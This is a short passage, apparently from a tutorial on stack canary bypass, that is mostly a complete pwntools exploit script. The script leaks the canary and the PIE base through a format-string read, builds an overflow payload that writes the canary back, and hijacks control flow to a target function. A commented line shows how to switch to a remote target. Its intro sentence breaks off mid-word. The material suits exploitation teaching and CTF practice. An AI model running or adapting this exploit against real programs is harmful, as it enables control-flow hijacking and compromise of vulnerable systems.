Exploitation
A stack canary helps to mitigate buffer overflow attacks by detecting a stack overflow before the corrupted return address is used and halting the program before the corruption can be exploited. Canary bypass refers to techniques that defeat the protection provided by the stack canary. Thi
from pwn import *
import re
# Target is a 64-bit Linux binary; this also makes p64() emit little-endian 8-byte values.
context.update(arch="amd64", os="linux")
filepath = "./example"
# Load the ELF so symbols (elf.sym) can be resolved once the PIE base is known.
elf = context.binary = ELF(filepath)
p = process(filepath) # p = remote('example.com', '1337') for remote connection
# The canary is a random per-process value whose lowest byte is 0x00, so a
# leaked 8-byte value ending in "00" is the likely candidate. The canary only
# protects the return address while it stays secret; the format-string read
# below is the information leak that undermines it. The hard-coded stack
# positions (10 and 13) are specific to this example binary.
# To find them, execute p.sendline(b"%p %p %p %p ...") and inspect the output.
p.sendline(b"%10$p %13$p")
# Assumes the program echoes the formatted string after the literal "result: ".
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
# First leak: an address inside the binary; 0xa90 is its offset from the PIE
# base for this example (presumably a return address — confirm per binary).
base = int(leaked[0], 16) - 0xa90
# Second leak: the canary itself.
canary = int(leaked[1], 16)
# Rebase the ELF so elf.sym[...] yields runtime addresses.
elf.address = base
# Stack layout assumed by this payload (example-specific):
#   24 bytes of buffer, then the canary, then 8 bytes of saved rbp,
#   then the saved return address.
payload = b"A"*24
# Write the canary back unchanged, so the epilogue check still passes:
# this is the "bypass" — the check is intact, the secret is not.
payload += p64(canary)
payload += b"B"*8
# base + 0x6fe is a binary-specific address executed before target_func
# (likely a stack-alignment gadget — TODO confirm in the example binary).
payload += p64(base + 0x6fe)
payload += p64(elf.sym["target_func"])
p.sendline(payload)
p.interactive()